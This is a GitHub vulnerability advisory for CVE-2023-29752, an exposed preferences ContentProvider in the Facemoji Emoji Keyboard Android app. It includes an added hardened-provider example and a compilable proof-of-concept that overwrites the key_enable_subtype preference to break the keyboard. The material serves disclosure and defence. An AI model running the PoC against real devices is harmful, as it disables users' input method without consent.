CVE-2023-29752: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.
Escalation of Privileges exists in Facemoji Emoji Keyboard (CVE-2023-29752)
Vendor: EKATOX APPS (https://www.facemojikeyboard.com/)
Affected product: Facemoji Emoji Keyboard (com.simejikeyboard)
Version: 2.9.1.2
Download link: https://play.google.com/store/apps/details?id=com.simejikeyboard
Description of the vulnerability for use in the CVE: An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.
Additional information: The Facemoji Emoji Keyboard application exposes a component whose methods any installed application can call without permission, and those methods write to a SharedPreferences file that the keyboard loads at launch and relies on for critical functionality. Specifically, a third-party app can modify the data in profile_enable_subtype.xml by sending an intent that carries attacker-chosen values. When the key_enable_subtype field is overwritten with an arbitrary string, the application's virtual keyboard can no longer output any characters. More seriously, when key_enable_subtype and key_subtype_enable_layout are both overwritten with arbitrary strings, the virtual keyboard no longer appears when any input box is tapped and the application keeps reporting errors, leading to escalation of privilege attacks.
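The root cause described above is a preference-writing ContentProvider reachable from other apps. The following is an added example, not code from the LianKee/SO-CVEs advisory or from the Facemoji app, showing how such a provider can be written so that a cross-app insert like the one in the PoC is refused: the `insert()` override checks that the calling UID is the app's own, requires the URI to have the `/string/<file>/<segment>` shape used in the advisory's PoC, and allow-lists the preference file, key, value length and value grammar before touching SharedPreferences. The package name, authority, class name, allowed-key set, size limit and value regex are all assumptions for illustration.

```java
// Added example (not from the advisory or the Facemoji app): a SharedPreferences-backed
// ContentProvider that refuses writes from other apps and validates what it is asked to store.
// Package, authority, allowed keys, size limit and value grammar are assumptions.
package com.example.hardened;   // hypothetical package

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.SharedPreferences;
import android.database.Cursor;
import android.net.Uri;
import android.os.Binder;
import android.os.Process;

import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

public class HardenedPrefsProvider extends ContentProvider {
    // Hypothetical authority; the real app's authority is whatever its manifest declares.
    static final String AUTHORITY = "com.example.hardened.prefs";
    // Only the preference file this provider is meant to manage (assumed).
    static final String PREFS_FILE = "profile_enable_subtype";
    // Only keys the app itself legitimately writes through this path (assumed set).
    static final Set<String> ALLOWED_KEYS = new HashSet<>(Arrays.asList(
            "key_enable_subtype", "key_subtype_enable_layout"));
    // The advisory's PoC writes a 10240-character value; a subtype identifier
    // has no reason to be anywhere near that long. Assumed limit.
    static final int MAX_VALUE_LENGTH = 256;

    @Override public boolean onCreate() { return true; }

    @Override
    public Uri insert(Uri uri, ContentValues values) {
        // 1. Caller check: even if the provider ends up exported by mistake,
        //    refuse writes whose Binder caller is not our own UID.
        if (Binder.getCallingUid() != Process.myUid()) {
            throw new SecurityException("cross-app write to preference provider refused");
        }
        // 2. Structural check: the path must be /string/<prefsFile>/<segment>,
        //    the shape used by the advisory's PoC URI.
        List<String> segs = uri.getPathSegments();
        if (segs.size() != 3 || !"string".equals(segs.get(0))) {
            throw new IllegalArgumentException("unexpected URI: " + uri);
        }
        String prefsFile = segs.get(1);
        String key = values == null ? null : values.getAsString("key");
        String value = values == null ? null : values.getAsString("value");
        // 3. Content check: allow-listed file and key, bounded and well-formed value.
        if (!isAcceptable(prefsFile, key, value)) {
            throw new IllegalArgumentException("rejected preference write");
        }
        SharedPreferences prefs = getContext()
                .getSharedPreferences(prefsFile, Context.MODE_PRIVATE);
        prefs.edit().putString(key, value).apply();
        return uri;
    }

    /** Pure validation, kept separate so it can be unit-tested without an Android runtime. */
    static boolean isAcceptable(String prefsFile, String key, String value) {
        if (prefsFile == null || key == null || value == null) return false;
        if (!PREFS_FILE.equals(prefsFile)) return false;
        if (!ALLOWED_KEYS.contains(key)) return false;
        if (value.isEmpty() || value.length() > MAX_VALUE_LENGTH) return false;
        // Subtype identifiers are treated as simple tokens; this grammar is an assumption.
        return value.matches("[A-Za-z0-9_,:-]+");
    }

    // Read and delete paths are out of scope for this example; deny by default.
    @Override public Cursor query(Uri u, String[] p, String s, String[] a, String o) { return null; }
    @Override public int delete(Uri u, String s, String[] a) { return 0; }
    @Override public int update(Uri u, ContentValues v, String s, String[] a) { return 0; }
    @Override public String getType(Uri u) { return null; }
}
```

The in-code UID check is defence in depth; the primary fix is in the manifest, declaring the provider with `android:exported="false"` (or, if another component of the same vendor genuinely needs it, guarding it with a signature-level `android:permission` or `android:writePermission`). For apps targeting API 17 or higher a `<provider>` already defaults to not exported, so a provider that other apps can reach was either exported explicitly or targets an old SDK level; either way the manifest is the first place to look when triaging a report of this kind, and the validation above limits the damage if that declaration is ever wrong again.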
poc:

```java
// PoC from the advisory, reformatted with straight quotes and the mismatched
// key/value quoting fixed. The method body is unchanged; imports and the
// getRandomString helper (called but not defined in the original) are added
// so it compiles inside an Activity or Service.
import android.content.ContentResolver;
import android.content.ContentValues;
import android.net.Uri;

import java.util.Random;

public void attack_keybord() {
    ContentResolver contentResolver = getApplicationContext().getContentResolver();
    // Path of the exposed preference provider; the trailing "xxx" is as given in the original.
    Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/profile_enable_subtype/xxx");
    ContentValues contentValues = new ContentValues();
    // 10240 arbitrary characters are written into the key_enable_subtype field.
    String randomString = getRandomString(10240);
    contentValues.put("key", "key_enable_subtype");
    contentValues.put("value", randomString);
    contentResolver.insert(uri, contentValues);
}

// Not part of the original PoC: a placeholder for the helper it calls.
private String getRandomString(int length) {
    Random rnd = new Random();
    StringBuilder sb = new StringBuilder(length);
    for (int i = 0; i < length; i++) {
        sb.append((char) ('a' + rnd.nextInt(26)));
    }
    return sb.toString();
}
```